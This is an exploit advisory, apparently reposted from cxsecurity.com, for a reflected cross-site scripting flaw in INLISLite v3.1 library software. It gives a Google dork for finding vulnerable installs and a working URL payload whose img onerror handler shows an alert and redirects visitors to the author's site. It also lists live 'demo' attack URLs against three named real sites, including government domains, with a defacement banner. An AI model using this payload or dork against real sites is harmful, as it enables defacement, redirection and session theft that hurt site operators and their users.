INLISLite v3.1 - Cross Site Scripting
2020-10-24 18:54:01 Author: cxsecurity.com(查看原文) 阅读量:338 收藏

INLISLite v3.1 - Cross Site Scripting

############################################################# # Exploit Title: INLISLite v3.1 - Cross Site Scripting # Google Dork: intext:"INLISLite v3.1" "/browse" # Date: 2020-10-24 # Exploit Author: Gh05t666nero # Team: IndoGhostSec # Vendor: perpusnas.go.id # Software Version: 3.1- # Software Link: N/A # Tested on: Linux gh05t666nero 5.8.0-kali2-686-pae #1 SMP Debian 5.8.10-1kali1 (2020-09-22) i686 GNU/Linux ############################################################# [*] Vuln Info: ============== Cross-Site Scripting or XSS attack is a security exploitation in which an attacker places malicious client-end code onto a web page. Attackers using XSS vulnerabilities steal user data, or control user sessions, run malicious code or even use it as a major component of phishing scams. ############################################################# [*] Exploit: ============ ?action=browse&tag=%3Ch2%3EXploited%20by%20IndoGhostSec%3C/h2%3E%3Cbr%3E%3Cbr%3E&findBy=%3Ch4%3EFeat%3C/h4%3E%3Cbr%3E&query=%3Ch2%3EGh05t666nero%3C/h2%3E&query2=%3Cimg%20src=x%20onerror=alert(%27Gh05t666nero%27,location=%22https://anonsec.my.id%22);%3E ############################################################# [*] Demo: ========= https://inlis.atrbpn.go.id/inlislite3/digitalcollection/browse?action=browse&tag=%3Ch2%3EXploited%20by%20IndoGhostSec%3C/h2%3E%3Cbr%3E%3Cbr%3E&findBy=%3Ch4%3EFeat%3C/h4%3E%3Cbr%3E&query=%3Ch2%3EGh05t666nero%3C/h2%3E&query2=%3Cimg%20src=x%20onerror=alert(%27Gh05t666nero%27,location=%22https://anonsec.my.id%22);%3E http://digilibfeb.ub.ac.id/article/browse?action=browse&tag=<h2>Xploited by IndoGhostSec</h2><br><br>&findBy=<h4>Feat</h4><br>&query=<h2>Gh05t666nero</h2>&query2=<img src=x onerror=alert('Gh05t666nero',location="https://anonsec.my.id");> https://perpustakaan.pemkomedan.go.id:8123/inlislite3/opac/browse?action=browse&tag=<h2>Xploited by IndoGhostSec</h2><br><br>&findBy=<h4>Feat</h4><br>&query=<h2>Gh05t666nero</h2>&query2=<img src=x onerror=alert('Gh05t666nero',location="https://anonsec.my.id");> ############################################################# [*] About Me: ============= # Website: www.anonsec.my.id # Telegram: t.me/Gh05t666nero # Instagram: instagram.com/ojan_cxs # Twitter: twitter.com/Gh05t666nero1



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2020100155
如有侵权请联系:admin#unsafe.sh